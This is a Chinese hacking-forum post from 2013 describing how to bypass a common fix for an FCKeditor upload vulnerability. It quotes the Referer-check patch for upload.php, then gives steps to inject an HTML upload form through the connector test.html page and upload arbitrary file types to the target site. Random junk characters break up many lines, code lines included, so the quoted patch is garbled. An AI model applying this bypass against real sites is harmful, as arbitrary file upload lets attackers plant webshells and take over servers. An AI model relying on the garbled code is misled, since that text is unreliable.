找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2172|回复: 0
打印 上一主题 下一主题

fckeditor 漏洞修复后的二次利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:12:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
7 z) n* u- \( L% @8 E网上给出的修复方案是, o7 x$ @' j6 m9 c" Q3 E/ {4 t
修复方法,删除FCK编辑器用其他的编辑器$ w% W0 u9 g9 J; v9 L
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件1 N- M2 T: _/ E& h  j# Y/ ^

- w. t& o" Q  c5 J! q- nrequire(‘config.php’);
2 L- d8 L. a7 q  y' x) W1 Zrequire(‘util.php’);% |, \# }" E9 P, f
的下面添加以下代码—————————–  h- ~6 W+ N$ ?% ?
//防止外部提交
' ~2 c+ l1 j( s& f0 [$ X2 xfunction outsidepost()
* Z" i2 }2 O  q1 L8 |{; l( }9 [' k8 O
$servername=$_SERVER['SERVER_NAME'];
& _) y& x( \2 W8 I$sub_from=@$_SERVER['HTTP_REFERER'];! x$ h: v9 n2 O3 Q4 C: `" a
$sub_len=strlen($servername);# c$ B) @( N( P
$checkfrom=substr($sub_from,7,$sub_len);
1 y2 R8 k0 F$ \! c- Dif($checkfrom!=$servername){
0 K9 u# F3 `; x( \9 q' jecho(“you don’t outsidepost!”);
! Y) G1 I! a- |exit;
# ~# }7 N( |8 U! F% f  [}
+ w) G+ P7 b6 `1 G8 V# A" S}4 @+ L# j; d% F' M
outsidepost();- T9 z) ]' [& [( y' \% q3 e' f' R5 m. N
防止外部提交,但是没有防止内部提交," H- m$ x& ~% T5 J$ v4 B% q0 J7 l3 ^
利用方法:& e7 \, V7 J( y) N
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
6 K0 Z+ j6 [0 j+ y1 c3 x2,在Current Folder 框输入/ E  y, W. M, F5 @: I; Y) h
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
( l. l) M* V/ \7 N然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。2 C. f$ Z) L2 U. t" h
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表